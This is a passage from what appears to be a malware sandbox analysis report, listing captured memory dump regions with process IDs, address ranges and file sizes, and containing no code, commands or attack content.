                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2340-409-0x0000000005610000-0x0000000005C12000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2340-346-0x0000000005610000-0x0000000005C12000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2340-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/2340-286-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/2340-521-0x0000000005610000-0x0000000005C12000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2560-246-0x0000000005820000-0x0000000005821000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2560-271-0x0000000005FD0000-0x0000000005FD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2560-252-0x00000000057C0000-0x00000000057C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2560-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/2560-242-0x0000000000EE0000-0x0000000000EE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2560-259-0x0000000005A10000-0x0000000005A11000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2644-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/2696-256-0x000000001B6B0000-0x000000001B6B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2696-244-0x0000000000DB0000-0x0000000000DB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2696-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/2696-229-0x00000000007F0000-0x00000000007F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2752-344-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/2752-408-0x0000000002EB0000-0x0000000002EB9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    36KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/2772-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/2832-302-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/2832-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/2924-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/3192-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/3192-277-0x0000000004BD0000-0x0000000004CA6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    856KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/3192-224-0x0000000002E7D000-0x0000000002EF9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    496KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/3220-495-0x0000000002CA0000-0x0000000002CB5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/3344-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/3344-535-0x0000000002140000-0x0000000002170000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    192KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/3408-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/3408-232-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/3656-596-0x0000000004F90000-0x000000000503B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    684KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/3668-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/3712-270-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4012-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4044-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4060-533-0x0000000005660000-0x0000000005C78000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4072-580-0x0000000005000000-0x00000000050DF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    892KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4072-581-0x0000000005190000-0x000000000523C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    688KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4348-288-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4432-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4440-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4440-269-0x0000000005E30000-0x0000000005F73000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    1.3MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4504-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4508-392-0x0000000005620000-0x00000000056FF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    892KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4508-394-0x0000000005700000-0x00000000057AB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    684KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4508-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4516-289-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4540-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4608-599-0x000000001BDE0000-0x000000001BDE2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4848-148-0x000001C807FE0000-0x000001C807FE4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    16KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4848-146-0x000001C807B60000-0x000001C807B70000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4848-147-0x000001C807BE0000-0x000001C807BF0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4908-233-0x000000000308D000-0x000000000309E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    68KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4908-275-0x0000000002EA0000-0x0000000002EA9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    36KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4908-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4928-568-0x00000000021A0000-0x000000000222E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    568KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4928-338-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4944-322-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-295-0x0000000000400000-0x0000000000422000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    136KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-315-0x0000000005520000-0x0000000005521000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-310-0x0000000005700000-0x0000000005701000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-305-0x00000000055F0000-0x00000000055F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-301-0x00000000054C0000-0x00000000054C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-294-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-299-0x0000000005A40000-0x0000000005A41000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4972-323-0x0000000005420000-0x0000000005A38000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4976-247-0x00000000020A0000-0x00000000020A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/4976-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5056-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5072-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5080-279-0x0000000002C60000-0x0000000002C61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5080-280-0x0000000002C60000-0x0000000002C61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5080-276-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5140-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5192-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5196-567-0x0000000004F70000-0x0000000005588000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5328-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5352-606-0x00000197516D2000-0x00000197516D4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5352-608-0x00000197516D4000-0x00000197516D5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5352-586-0x00000197516D0000-0x00000197516D2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5420-373-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5420-402-0x0000000000FB0000-0x0000000000FB2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5496-380-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5508-487-0x0000000000E70000-0x0000000000F46000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    856KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5508-381-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5524-537-0x0000000007270000-0x000000000C29C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    80.2MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5524-556-0x0000000000400000-0x0000000005487000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    80.5MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5524-383-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                  • memory/5536-452-0x00000000061E0000-0x00000000067F8000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5544-405-0x0000000004D90000-0x0000000004DF6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    408KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5560-404-0x0000000004E50000-0x00000000050D6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    2.5MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5568-516-0x00000000057A0000-0x00000000057A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5584-479-0x0000000005D60000-0x0000000005D61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5592-510-0x0000000005640000-0x0000000005C58000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5616-505-0x0000000005610000-0x0000000005C28000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5624-500-0x0000000003AD0000-0x0000000003AD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5636-508-0x0000000005CC0000-0x0000000005CC1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/5700-593-0x0000000000400000-0x0000000000415000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/6036-426-0x00000000014A0000-0x00000000014B0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/6036-433-0x00000000014C0000-0x00000000014D2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    72KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/6080-445-0x000000001BAF0000-0x000000001BAF2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                  • memory/6088-422-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                    36KB